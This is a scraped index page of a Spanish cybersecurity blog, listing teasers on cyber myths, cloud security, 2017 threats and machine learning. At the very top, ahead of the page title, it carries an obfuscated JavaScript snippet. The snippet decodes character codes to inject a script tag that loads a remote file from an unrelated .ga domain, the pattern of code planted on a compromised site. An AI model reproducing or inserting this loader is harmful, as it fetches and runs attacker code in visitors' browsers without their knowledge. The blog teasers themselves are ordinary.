Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,98,111,110,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Blog | Blog TBSEK - Part 16
jueves, septiembre 24, 2020
Home Blog Page 16

4 mitos sobre la ciberseguridad

0

Entendiendo la Ciberseguridad como la necesidad de implementar sistemas de seguridad robustos capaces de identificar y realizar acciones antes, durante y después de que se haya presentado una amenaza en la seguridad de la infraestructura tecnológica. No solo para prevenir la materialización de un posible riesgo, también para aumentar la confianza de los clientes, minimizando cualquier riesgo que pueda tener un impacto negativo en el negocio.…

Resumen de las amenazas globales que atacaron durante el 2017

0

A pesar de las grandes inversiones en herramientas de seguridad tradicionales, la realidad es que las “amenazas” o los atacantes pueden infiltrarse en las redes sin que dichos controles de seguridad puedan detectarlos. Esto representa un gran reto para los responsables de las áreas de tecnología, los cuales deben de identificar las herramientas adecuadas que les permitan anticiparse a los riesgos inherentes al uso de plataformas tecnológicas.…

Mitos y Realidades de la seguridad en la nube

0

Al principio existió mucha incertidumbre de que tan segura puede estar la información en servicios ubicados en la nube y al mismo tiempo las empresas gastaban millones en mantener la seguridad de sus equipos de cómputo centrales los cuales aun así podían en algunos casos ser vulnerados derivada de una incorrecta gestión de los mismos por parte de su propio personal de tecnología, por lo que pensar que la información está más segura en una plataforma propia que en la nube es un mito.…

4 prácticas fundamentales en un modelo de ciberseguridad

0

El término Ciberseguridad se utiliza cada día con más familiaridad, ya que nace a partir del crecimiento de conexiones e interconexiones en un mundo en donde la seguridad de los datos debe ser cada vez más robusta, ya que, derivado del uso de Internet, tanto las empresas como los particulares estamos expuestos cada día a mayores riesgos, mismos que podrán ser significativos o no, dependiendo del uso y controles que tengamos para administrar de forma segura los recursos de tecnologías de la información que soporten nuestro andar diario en el mundo digital.…

Machine LearningTechnology aplicado a la Ciberseguridad

0

Día a día la tecnología avanza en su alcance y uso, y de la misma manera las amenazas derivadas de dichos avances se incrementan por lo que cada equipo conectado a la red corporativa puede ser un aliado que nos ayude a evitar la materialización de un riesgo o por el contrario puede ser una puerta por la cual un ataque tenga éxito.…

UDLAP elige Darktrace como su aliado en Ciberseguridad

0

Con una comunidad estudiantil de más de 12, 000 alumnos y docentes, la Universidad de Las Américas Puebla innova en el ámbito tecnológico e incorpora la solución Enterprise Inmune System de Darktrace. Una herramienta que utiliza protocolos de Machine Learning por medio de inteligencia artificial para detectar y efectuar acciones oportunas ante las amenazas informáticas que se presentan en tiempo real.…